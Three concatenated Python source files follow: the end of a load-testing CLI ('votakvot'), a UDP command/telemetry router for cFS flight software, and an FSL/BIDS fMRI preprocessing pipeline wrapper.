parser.add_argument("-c", "--concurrency", help="Concurrency", type=int, default=1)
parser.add_argument("-q", "--quiet", help="Don't display progress bar", action="store_true")
parser.add_argument("-w", "--warmup", help="Number of skipped requests", default=0, type=int)
parser.add_argument("-p", "--path", help="Path to results storage", type=str, default=".")
parser.add_argument("-t", "--tid", help="Tid identifier", default=None)
parser.add_argument("-g", "--gevent", help="Patch sockets with Gevent", action='store_true', default=False)
parser.add_argument("-s", "--strict", help="Fail on a first error", action='store_true')
parser.add_argument("--max-errors", help="Max number of captured errors", type=int, default=100)
group = parser.add_mutually_exclusive_group()
group.add_argument("-n", "--number", help="Number of requests", type=int)
group.add_argument("-d", "--duration", help="Duration in seconds", type=int)
parser.add_argument("callback", type=str, help="Python callable name")
parser.add_argument("param", metavar="KEY=VALUE", nargs="*", help="Function named argument")
opts = parser.parse_args(args)
if opts.gevent:
GeventConcurrencyEnv.gevent_install()
concurrency_env = GeventConcurrencyEnv(opts.concurrency)
else:
concurrency_env = ThreadConcurrencyEnv(opts.concurrency)
if opts.number is None and opts.duration is None:
opts.number = 1
if opts.concurrency > 100:
print("warning: too big `concurrency`, consider enabling Gevent with `--gevent`")
callback_name = opts.callback
callback = resolve_obj(opts.callback)
if opts.tid is None:
dt_suffix = datetime.datetime.now().strftime("%y-%m-%d/%H:%M:%S")
opts.tid = f"{callback_name}/{dt_suffix}"
params = {}
for p in opts.param:
k, v = p.split("=", 1)
if k in params:
raise ValueError("Duplicated parameter", k)
try:
v = eval(v, {}, {})
except Exception:
pass
params[k] = v
print("votakvot")
print(f"run '{callback_name}(" + ", ".join(f"{k}={v!r}" for k, v in params.items()) + ")'")
print(f"use {opts.concurrency} parallel workers")
if opts.number:
print(f"make {opts.number} runs")
else:
print(f"keep running for {round(opts.duration)} seconds")
if opts.warmup:
print(f"skip {opts.warmup} first runs")
print("running...")
trial = run(
callback=callback,
params=params,
path=opts.path,
tid=opts.tid,
number=opts.number,
duration=opts.duration,
warmup=opts.warmup,
show_progress=not opts.quiet,
strict=opts.strict,
max_errors=opts.max_errors,
concurrency_env=concurrency_env,
)
try:
collector = trial.result
except votakvot.core.TrialFailedException as e:
print("absolutely fail!")
print(e.traceback_txt.strip())
exit(2)
print("done")
print("")
if collector.real_rps > 1000:
        print("warning: too high rps\nresults might be very inaccurate")
print()
def ms(t):
return "{:.2f} ms".format(1000 * t)
print(f"was made \t {collector.total_count} runs")
if collector.duration:
print(f"average \t {ms(collector.duration.average)}")
print(f"std_dev \t {ms(collector.duration.std_dev)}")
print(f"minimum \t {ms(collector.duration.minimum)}")
print(f"maximum \t {ms(collector.duration.maximum)}")
print(f"percentiles:")
for pn, pv in collector.duration.percentiles.items():
print(f" pct {pn:02} \t {ms(pv)}")
if collector.results:
print(f"results:")
for d in collector.results:
print(f" {d.count} times \t {d.result!r}")
else:
print(f"no results")
if collector.errors:
print(f"errors:")
for e in collector.errors:
print(f" {e.count} times \t {e.error}")
else:
print(f"no errors")
print(f"more info at\n {trial.path}")
print("absolutely!")
if __name__ == "__main__":
main()
|
cmdtlmrouter.py
|
"""
Copyright 2022 Open STEMware Foundation
All Rights Reserved.
This program is free software; you can modify and/or redistribute it under
the terms of the GNU Affero General Public License as published by the Free
Software Foundation; version 3 with attribution addendums as found in the
LICENSE.txt
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
details.
This program may also be used under the terms of a commercial or enterprise
edition license of cFSAT if purchased from the copyright holder.
Purpose:
Manage UDP connections to the cFS
Notes:
      1. This design supports a single router connected to a single cFS
         instance running UDP versions of the command ingest and telemetry
         output apps.
      2. The app that creates the router communicates with the router via queues.
         The router supports additional UDP command sources and telemetry
         destinations. Commands from multiple UDP command sockets are not sent
         directly to the cFS; they are placed in a queue that can be read by the
         parent app. This allows the app to serve as a single point for managing
         flight commands. Telemetry is routed from the cFS socket to multiple
         telemetry monitors.
3.
"""
import socket
import logging
from queue import Queue
from threading import Thread, Lock
logger = logging.getLogger("router")
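# A minimal usage sketch (addresses, ports and timeout below are illustrative assumptions):
#   router = CmdTlmRouter('127.0.0.1', 1234, '127.0.0.1', 1235, 1.0)
#   router.start()
#   router.get_cfs_cmd_queue().put(cmd_datagram)            # datagram bytes forwarded to the cFS command socket
#   tlm_datagram, host = router.get_gnd_tlm_queue().get()   # telemetry received from the cFS
#   router.shutdown()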
###############################################################################
class CfsCmdSource():
"""
Provide a socket to receive cFS commands from a cFSAT CmdTlmProcess
object.
"""
def __init__(self, ip_addr, port, timeout):
self.enabled = True
self.socket = None
self.ip_addr = ip_addr
self.port = port
self.socket_addr = (self.ip_addr, self.port)
self.timeout = timeout
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.socket_addr)
self.socket.setblocking(False)
self.socket.settimeout(self.timeout)
def read_cmd_port(self, queue):
try:
while True:
datagram, host = self.socket.recvfrom(1024)
queue.put((datagram, host))
logger.info(f"Received cmd source datagram: size={len(datagram)} {host}")
print(f"Received cmd source datagram: size={len(datagram)} {host}")
except socket.timeout:
pass
###############################################################################
class CmdTlmRouter(Thread):
def __init__(self, cfs_ip_addr, cfs_cmd_port, gnd_ip_addr, gnd_tlm_port, gnd_tlm_timeout):
super().__init__()
self.enabled = True
# COMMANDS
self.cfs_cmd_socket = None
self.cfs_ip_addr = cfs_ip_addr
self.cfs_cmd_port = cfs_cmd_port
self.cfs_cmd_queue = Queue()
self.cfs_cmd_socket_addr = (self.cfs_ip_addr, self.cfs_cmd_port)
self.cfs_cmd_source = {}
self.cfs_cmd_source_queue = Queue()
# TELEMETRY
self.gnd_tlm_socket = None
self.gnd_ip_addr = gnd_ip_addr
self.gnd_tlm_port = gnd_tlm_port
self.gnd_tlm_queue = Queue()
self.gnd_tlm_socket_addr = (self.gnd_ip_addr, self.gnd_tlm_port)
self.gnd_tlm_timeout = gnd_tlm_timeout
self.tlm_dest_mutex = Lock()
self.tlm_dest_addr = {}
self.tlm_dest_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tlm_dest_connect_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tlm_dest_connect_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.tlm_dest_connect_socket.bind((self.gnd_ip_addr, 7777))
self.tlm_dest_connect_socket.setblocking(True)
self.tlm_dest_connect = Thread(target=self.tlm_dest_connect_thread)
self.tlm_dest_connect.kill = False
logger.info(f"CmdTlmRouter Init: cfs_cmd_socket{self.cfs_cmd_socket_addr}, gnd_tlm_socket{self.gnd_tlm_socket_addr}")
def get_cfs_cmd_source_queue(self):
return self.cfs_cmd_source_queue
def get_cfs_cmd_queue(self):
return self.cfs_cmd_queue
def get_gnd_tlm_queue(self):
return self.gnd_tlm_queue
def add_cmd_source(self, cmd_port):
self.cfs_cmd_source[cmd_port] = CfsCmdSource(self.gnd_ip_addr, cmd_port, 0.1) #todo - Decide on timeout management
def remove_cmd_source(self, cmd_port):
try:
del self.cfs_cmd_source[cmd_port]
except KeyError:
            logger.error("Error removing nonexistent command source %d from cfs_cmd_source dictionary" % cmd_port)
def add_tlm_dest(self, tlm_port):
self.tlm_dest_mutex.acquire()
self.tlm_dest_addr[tlm_port] = (self.gnd_ip_addr, tlm_port)
self.tlm_dest_mutex.release()
def remove_tlm_dest(self, tlm_port):
self.tlm_dest_mutex.acquire()
try:
del self.tlm_dest_addr[tlm_port]
except KeyError:
            logger.error("Error removing nonexistent telemetry destination %d from tlm_dest_addr dictionary" % tlm_port)
self.tlm_dest_mutex.release()
def run(self):
# COMMANDS
self.cfs_cmd_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# TELEMETRY
self.gnd_tlm_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.gnd_tlm_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.gnd_tlm_socket.bind(self.gnd_tlm_socket_addr)
self.gnd_tlm_socket.setblocking(False)
self.gnd_tlm_socket.settimeout(self.gnd_tlm_timeout)
self.tlm_dest_connect.start()
try:
while self.enabled:
self.manage_routes()
except OSError:
# shutting down
pass
except Exception as e:
logger.error(f"CmdTlmRouter stopped due to error: {e}")
self.shutdown()
def manage_routes(self):
try:
while True:
datagram, host = self.gnd_tlm_socket.recvfrom(4096)
logger.debug(f"Received datagram: size={len(datagram)} {host}")
logger.debug(self.print_datagram(datagram))
self.gnd_tlm_queue.put((datagram, host))
self.tlm_dest_mutex.acquire()
for dest_addr in self.tlm_dest_addr:
self.tlm_dest_socket.sendto(datagram, self.tlm_dest_addr[dest_addr])
logger.debug("Sending tlm to destination " + str(dest_addr))
self.tlm_dest_mutex.release()
except socket.timeout:
pass
while not self.cfs_cmd_queue.empty():
datagram = self.cfs_cmd_queue.get()
self.cfs_cmd_socket.sendto(datagram, self.cfs_cmd_socket_addr)
logger.debug(self.print_datagram(datagram))
for cmd_source in self.cfs_cmd_source:
self.cfs_cmd_source[cmd_source].read_cmd_port(self.cfs_cmd_source_queue)
def tlm_dest_connect_thread(self):
logger.info("Starting tlm_dest_connect_thread")
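        # Registration protocol: a telemetry monitor sends a UDP datagram of the form b"<ip>,<port>"
        # (e.g. b"127.0.0.1,8008") to the connect socket bound in __init__ (port 7777); telemetry
        # received from the cFS is then also forwarded to that (ip, port).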
while not self.tlm_dest_connect.kill:
datagram, host = self.tlm_dest_connect_socket.recvfrom(1024)
self.tlm_dest_mutex.acquire()
print("Accepted connection from " + str(host))
print("Datagram = ", datagram.decode().split(','))
dest_addr = datagram.decode().split(',')
self.tlm_dest_addr[int(dest_addr[1])] = (dest_addr[0],int(dest_addr[1]))
self.tlm_dest_mutex.release()
logger.info("Accepted connection from " + str(host))
def print_datagram(self, datagram):
output = []
for chunk in [datagram[i:i + 8] for i in range(0, len(datagram), 8)]:
output.append(" ".join([f"0x{byte:02X}" for byte in chunk]))
return "\n".join(output)
def shutdown(self):
logger.info("CmdTlm router shutdown")
self.enabled = False
self.tlm_dest_connect.kill = True
self.cfs_cmd_socket.close()
self.gnd_tlm_socket.close()
self.tlm_dest_socket.close()
self.tlm_dest_connect_socket.close()
###############################################################################
"""
import socket
import os
from _thread import *
ServerSideSocket = socket.socket()
host = '127.0.0.1'
port = 2004
ThreadCount = 0
try:
ServerSideSocket.bind((host, port))
except socket.error as e:
print(str(e))
print('Socket is listening..')
ServerSideSocket.listen(5)
def multi_threaded_client(connection):
connection.send(str.encode('Server is working:'))
while True:
data = connection.recv(2048)
response = 'Server message: ' + data.decode('utf-8')
if not data:
break
connection.sendall(str.encode(response))
connection.close()
while True:
Client, address = ServerSideSocket.accept()
print('Connected to: ' + address[0] + ':' + str(address[1]))
start_new_thread(multi_threaded_client, (Client, ))
ThreadCount += 1
print('Thread Number: ' + str(ThreadCount))
ServerSideSocket.close()
import socket
ClientMultiSocket = socket.socket()
host = '127.0.0.1'
port = 2004
print('Waiting for connection response')
try:
ClientMultiSocket.connect((host, port))
except socket.error as e:
print(str(e))
res = ClientMultiSocket.recv(1024)
while True:
Input = input('Hey there: ')
ClientMultiSocket.send(str.encode(Input))
res = ClientMultiSocket.recv(1024)
print(res.decode('utf-8'))
ClientMultiSocket.close()
"""
|
fmripreproc_wrapper.py
|
#!/usr/bin/env python
# ## PIPELINE: fmripreproc_wrapper.py
# ## USAGE: python3 fmripreproc_wrapper --in=<inputs> --out=<outputs> [OPTIONS]
# * requires python3 and FSL (calls FSL via python subprocess)
#
# ## Author(s)
#
# * Amy K. Hegarty, Intermountain Neuroimaging Consortium, University of Colorado Boulder
# * University of Colorado Boulder
#
# ## Product
#
# FSL Pipelines
#
# ## License
#
# <!-- References -->
# [FSL]: https://fsl.fmrib.ox.ac.uk/fsl/fslwiki
# [pybids]: Yarkoni et al., (2019). PyBIDS: Python tools for BIDS datasets. Journal of Open Source Software, 4(40), 1294, https://doi.org/10.21105/joss.01294
# Yarkoni, Tal, Markiewicz, Christopher J., de la Vega, Alejandro, Gorgolewski, Krzysztof J., Halchenko, Yaroslav O., Salo, Taylor, ... Blair, Ross. (2019, August 8). bids-standard/pybids: 0.9.3 (Version 0.9.3). Zenodo. http://doi.org/10.5281/zenodo.3363985
#
# ------------------------------------------------------------------------------
# Show usage information for this script
# ------------------------------------------------------------------------------
def print_help():
print("""
fMRI Preprocessing Pipeline
Usage: """ + """ --in=<bids-inputs> --out=<outputs> --participant-label=<id> [OPTIONS]
OPTIONS
--help show this usage information and exit
--participant-label= participant name for processing (pass only 1)
      --work-dir=          (Default: <outputs>/fmripreproc/scratch/sub-<participant-label>)
                           path for the working directory
--clean-work-dir= (Default: TRUE) clean working directory
--run-qc add flag to run automated quality
control for preprocessing
--run-aroma add flag to run aroma noise removal on
preprocessed images
--run-fix (?) add flag to run fsl-fix noise removal on
preprocessed images
    ** OpenMP used for parallelized execution of XXX. Multiple cores (CPUs)
are recommended (XX cpus for each fmri scan).
** see github repository for more information and to report issues:
https://github.com/intermountainneuroimaging/fmri-preproc.git
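    Example (paths and participant label below are illustrative):
       python3 fmripreproc_wrapper.py --in=/data/bids --out=/data/derivatives --participant-label=01 --run-qc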
""")
# ------------------------------------------------------------------------------
# Parse arguments for this script
# ------------------------------------------------------------------------------
def parse_arguments(argv):
import os
import sys
import getopt
    # initialize arguments
print("\nParsing User Inputs...")
qc = False
cleandir = False
runaroma = False
runfix = False
overwrite=False
try:
opts, args = getopt.getopt(argv,"hi:o:",["in=","out=","help","participant-label=","work-dir=","clean-work-dir=","run-qc","run-aroma","run-fix"])
except getopt.GetoptError:
print_help()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print_help()
sys.exit()
elif opt in ("-i", "--in"):
inputs = arg
if not os.path.exists(inputs):
raise Exception("BIDS directory does not exist")
elif opt in ("-o", "--out"):
outputs = arg
elif opt in ("--participant-label"):
pid = arg
elif opt in ("--work-dir"):
wd = arg
elif opt in ("--clean-work-dir"):
cleandir = arg
elif opt in ("--run-qc"):
qc=True
elif opt in ("--run-aroma"):
runaroma = True
elif opt in ("--run-fix"):
runfix = True
if 'inputs' not in locals():
print_help()
raise Exception("Missing required argument --in=")
sys.exit()
if 'outputs' not in locals():
print_help()
raise Exception("Missing required argument --out=")
sys.exit()
if 'pid' not in locals():
print_help()
raise Exception("Missing required argument --participant-label=")
sys.exit()
if not "wd" in locals():
wd=outputs + "/fmripreproc/scratch/sub-" + pid
print('Input Bids directory:\t', inputs)
    print('Derivatives path:\t', outputs + '/fmripreproc')
print('Working directory:\t',wd)
print('Participant:\t\t', str(pid))
class args:
def __init__(self, wd, inputs, outputs, pid, qc, cleandir, runaroma, runfix):
self.wd = wd
self.inputs = inputs
self.outputs = outputs
self.pid = pid
self.runQC=qc
self.cleandir=cleandir
self.runaroma=runaroma
self.runfix=runfix
scriptsdir=os.path.dirname(os.path.realpath(__file__))
self.templates=scriptsdir+'/fmripreproc_code'
self.overwrite=False
entry = args(wd, inputs, outputs, pid, qc, cleandir, runaroma, runfix)
return entry
# ------------------------------------------------------------------------------
# Parse Bids inputs for this script
# ------------------------------------------------------------------------------
def bids_data(entry):
import os
import glob
import bids
import json
bids.config.set_option('extension_initial_dot', True)
layout = bids.BIDSLayout(entry.inputs, derivatives=False, absolute_paths=True)
    if not os.path.exists(entry.outputs + '/fmripreproc') or not os.path.exists(entry.outputs + '/fmripreproc/' + 'dataset_description.json'):
os.makedirs(entry.outputs,mode=511,exist_ok=True)
os.makedirs(entry.outputs + '/fmripreproc', mode=511,exist_ok=True)
# make dataset_description file...
import json
data = {
'Name': 'FSL fMRI Minimal Preprocessing',
"BIDSVersion": "1.1.1",
"PipelineDescription": {
"Name": "FSL fMRI Minimal Preprocessing",
"Version": "0.0.1",
"CodeURL": "..."
},
"CodeURL": "https://github.com/intermountainneuroimaging/fmri-preproc.git",
"HowToAcknowledge": "Please cite all relevant works for FSL tools: bet, topup, mcflirt, aroma and python tools: pybids ( https://doi.org/10.21105/joss.01294, https://doi.org/10.21105/joss.01294)"}
with open(entry.outputs + '/fmripreproc/' + 'dataset_description.json', 'w') as outfile:
json.dump(data, outfile, indent=2)
return layout
# ------------------------------------------------------------------------------
# Main Pipeline Starts Here...
# ------------------------------------------------------------------------------
def worker(name,cmdfile):
"""Executes the bash script"""
import subprocess
from subprocess import PIPE
process = subprocess.Popen(cmdfile.split(), stdout=PIPE, stderr=PIPE, universal_newlines=True)
output, error = process.communicate()
print(error)
print('Worker: ' + name + ' finished')
return
def writelist(filename,outlist):
textfile = open(filename, "w")
for element in outlist:
textfile.write(element + "\n")
textfile.close()
def checkfile_string(filename,txt):
with open(filename) as temp_f:
datafile = temp_f.readlines()
for line in datafile:
if txt in line:
return True # The string is found
return False # The string does not exist in the file
def run_bet(layout,entry):
import os
import sys
import subprocess
import multiprocessing
returnflag=False
# check if output exists already
if os.path.exists(entry.wd + '/bet/t1bet/struc_acpc_brain.nii.gz') and not entry.overwrite:
print('Brain Extraction output exists...skipping')
else: # Run BET
print("\nRunning BET...\n")
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
t1w=t1w[0]
imgpath = t1w.path
imgname = t1w.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_bet.sh " + imgpath + " " + entry.wd
name = "bet"
p = multiprocessing.Process(target=worker, args=(name,cmd))
p.start()
print(p)
returnflag=True
p.join() # blocks further execution until job is finished
return returnflag
def save_bet(layout,entry):
import os
import sys
t1w=layout.get(subject=entry.pid, extension='nii.gz', suffix='T1w')
imgpath=t1w[0].path
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'anat'
ent['space'] = 'T1w'
ent['desc'] = 'brain'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
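    # For example, for entities like {'subject': '01'} (no session or run) the pattern above expands
    # to roughly "fmripreproc/sub-01/anat/sub-01_space-T1w_desc-brain_T1w.nii.gz"; the exact name
    # depends on which entities are present in the input file.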
ent['desc'] = 'brain'
ent['suffix'] = 'mask'
outmask = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['desc'] = 'head'
ent['suffix'] = 'T1w'
outhead = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/bet/t1bet/struc_acpc_brain.nii.gz ' + entry.outputs + "/" + outfile)
os.system('cp -p ' + entry.wd + '/bet/t1bet/struc_acpc_brain_mask.nii.gz ' + entry.outputs + "/" + outmask)
os.system('cp -p ' + entry.wd + '/bet/t1bet/struc_acpc.nii.gz ' + entry.outputs + "/" + outhead)
## end run_bet
def run_topup(layout,entry):
import os
import sys
import subprocess
import multiprocessing
import numpy as np
import re
    # check the number of fieldmap pairs
fmapfiles=layout.get(subject=entry.pid, extension='nii.gz', suffix='epi');
jobs=[]
returnflag=False
if np.remainder(len(fmapfiles), 2) != 0:
raise Exception("Topup cannot be run...unbalanced Fieldmap pairs")
npairs = int(len(fmapfiles)/2)
print(fmapfiles)
fmapfilenames = [item.path for item in fmapfiles]
for r in range(1,npairs+1):
run=str(r).zfill(2)
fmappair = [x for x in fmapfilenames if 'run-'+run in x]
if not fmappair:
fmappair = fmapfilenames
# check if output exists already
if os.path.exists(entry.wd + '/topup-'+run+'/topup4_field_APPA.nii.gz') and not entry.overwrite:
print('Topup-' + run + ' output exists...skipping')
continue
print(" ")
# Run Topup
print("\nRunning Topup...\n")
# check two fieldmaps collected with opposing phase encoding directions
ap=False ; pa=False
for fmap in fmappair:
img = layout.get_file(fmap)
ent = img.get_entities()
if 'AP' in ent['direction']:
ap=True; img1=img.path ; meta=img.get_metadata()
elif 'PA' in ent['direction']:
pa=True ; img2=img.path
        if not (ap and pa):
            # both an AP and a PA fieldmap are required to run topup
            raise Exception("Topup cannot be run...Missing AP or PA fieldmaps")
# add notes on intended in working dir
os.makedirs(entry.wd + '/topup-'+run,exist_ok=True)
writelist(entry.wd + '/topup-'+run+'/intendedfor.list', meta['IntendedFor'])
# run script
cmd = "bash " + entry.templates + "/run_topup.sh " + img1 + " " + img2 + " " + entry.wd+'/topup-'+run + " " + str(meta['TotalReadoutTime'])
name = "topup"+run
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() #wait for all topup commands to finish
return returnflag
## end run_topup
def run_distcorrepi(layout,entry):
import os
import sys
import subprocess
import multiprocessing
import glob
itr=0;
nfiles = len(layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'))
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, extension='nii.gz', suffix=['bold','sbref']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# get file metadata
meta=func.get_metadata()
aqdir=meta['PhaseEncodingDirection']
if os.path.exists(entry.wd + '/distcorrepi/' + 'dc_' + imgname) and not entry.overwrite:
itr=itr+1
print("Distortion correction output exists...skipping: " + imgname)
continue
print(" ")
# ------- Running distortion correction ------- #
        # select topup file based on acquisition direction
if aqdir == "j-":
param = "acqparams_AP.txt"
fout = "topup4_field_APPA"
elif aqdir == "j":
param = "acqparams_PA.txt"
fout = "topup4_field_PAAP"
s=', '
print('Using: ' + imgpath)
print('Using: ' + param)
print('Using: ' + fout)
print("distortion corrected image: " + 'dc_' + imgname)
# select correct topup directory
topupdir=[]
for ff in glob.iglob(entry.wd + '/topup-*/intendedfor.list'):
if checkfile_string(ff,imgname):
s='/'
topupdir = ff.split('/')[-2]
if not topupdir:
raise Exception("Cannot identify fieldmap intended for distortion correction:" +imgname)
# -------- run command -------- #
cmd = "bash " + entry.templates + "/run_distcorrepi.sh " + imgpath + " " + fout + " " + param + " " + topupdir + " " + entry.wd
print(cmd)
print(" ")
name = "distcorr-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
itr = itr+1
print(p)
returnflag=True
for job in jobs:
job.join() #wait for all distcorrepi commands to finish
return returnflag
## end run_discorrpei
def run_preprocess(layout,entry):
import os
import sys
import subprocess
import multiprocessing
itr=0;
nfiles = len(layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'))
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
if os.path.exists(entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_mcf.nii.gz') and not entry.overwrite:
itr=itr+1
print("Motion correction output exists...skipping: " + imgname)
continue
print(" ")
# ------- Running preprocessing: motion correction + trimming ------- #
s=', '
print('Using: ' + imgpath)
# -------- run command -------- #
entry.trimvols=10; # make input!!
cmd = "bash " + entry.templates + "/run_preprocess.sh " + imgpath + " " + ent['task'] + str(ent['run']) + " " + entry.wd + " " + str(entry.trimvols)
print(cmd)
print(" ")
name = "preproc-" + ent['task'] + str(ent['run'])
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
itr = itr+1
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_preprocess
def save_preprocess(layout,entry):
import os
import sys
# Move output files to permanent location
for func in layout.get(subject=entry.pid, extension='nii.gz', suffix='bold'):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'native'
ent['desc'] = 'preproc'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
# Add additional info to output file entities
ent['space'] = 'native'
ent['desc'] = 'preproc'
ent['suffix'] = 'sbref'
outfile_sbref = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Motion corrected image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_mcf.nii.gz ' + entry.outputs + "/" + outfile)
if os.path.exists(entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_SBRef_bet.nii.gz'):
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_SBRef_bet.nii.gz ' + entry.outputs + "/" + outfile_sbref)
else:
os.system('cp -p ' + entry.wd + '/preproc/' + ent['task'] + str(ent['run']) + '_meanvol_bet.nii.gz ' + entry.outputs + "/" + outfile_sbref)
## END SAVE_PREPROCESS
def run_registration(layout,entry):
import os
import sys
import subprocess
import multiprocessing
jobs=[];
returnflag=False
for func in layout.get(subject=entry.pid, desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
t1w = layout.get(subject=entry.pid, desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
t1whead = layout.get(subject=entry.pid, desc='head', extension='nii.gz', suffix='T1w')
t1wheadpath = t1whead[0].path
if os.path.exists(entry.wd + '/reg/' + ent['task'] + str(ent['run']) +'/' + 'func_data2standard.nii.gz') and not entry.overwrite:
print("Registration complete...skipping: " + imgname)
continue
print(" ")
# ------- Running registration: T1w space and MNI152Nonlin2006 (FSLstandard) ------- #
s=', '
print('Registering: ' + imgpath)
print('Using: ' + t1wpath)
# -------- run command -------- #
stdpath = os.popen('echo $FSLDIR/data/standard/MNI152_T1_2mm_brain.nii.gz').read().rstrip()
cmd = "bash " + entry.templates + "/run_registration.sh " + imgpath + " " + t1wheadpath + " " + t1wpath + " " + stdpath + " " + entry.wd
name = "registration-" + ent['task'] + str(ent['run']) + "-" + ent['suffix']
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
print(p)
returnflag=True
for job in jobs:
job.join() # wait for all preproc commands to finish
return returnflag
## end run_registration
def save_registration(layout,entry):
import os
import sys
# move outputs to permanent location...
for func in layout.get(subject=entry.pid, space='native', desc='preproc', extension='nii.gz', suffix=['bold']):
imgpath = func.path
imgname = func.filename
# output filename...
ent = layout.parse_file_entities(imgpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'func'
ent['space'] = 'MNI152Nonlin2006'
ent['desc'] = 'preproc'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['suffix'] = 'sbref'
outfile_sbref = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_desc-{desc}]_{suffix}/",
ent['type'] = 'func'
ent['desc'] = []
ent['suffix'] = 'reg'
outdir_reg = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
print("Registered image: " + outfile)
os.system('mkdir -p $(dirname ' + entry.outputs + '/' + outfile + ')')
os.system('cp -p ' + entry.wd + '/reg/' + ent['task'] + str(ent['run']) + '/' + 'func_data2standard.nii.gz ' + entry.outputs + '/' + outfile)
os.system('cp -p ' + entry.wd + '/reg/' + ent['task'] + str(ent['run']) + '/' + 'example_func2standard.nii.gz ' + entry.outputs + '/' + outfile_sbref)
# copy registration matricies
os.system('mkdir -p ' + entry.outputs + '/' + outdir_reg)
os.system('cp -p ' + entry.wd + '/reg/' + ent['task'] + str(ent['run']) + '/' + '*.mat ' + entry.outputs + '/' + outdir_reg)
# move t1w images...
t1w = layout.get(subject=entry.pid, desc='brain', extension='nii.gz', suffix='T1w')
t1wpath = t1w[0].path
# output filename...
entfunc = layout.parse_file_entities(imgpath) # save from above
ent = layout.parse_file_entities(t1wpath)
if 'run' in ent:
ent['run']=str(ent['run']).zfill(2)
# Define the pattern to build out of the components passed in the dictionary
pattern = "fmripreproc/sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Add additional info to output file entities
ent['type'] = 'anat'
ent['space'] = 'MNI152Nonlin2006'
ent['desc'] = 'brain'
outfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
ent['suffix'] = 'mask'
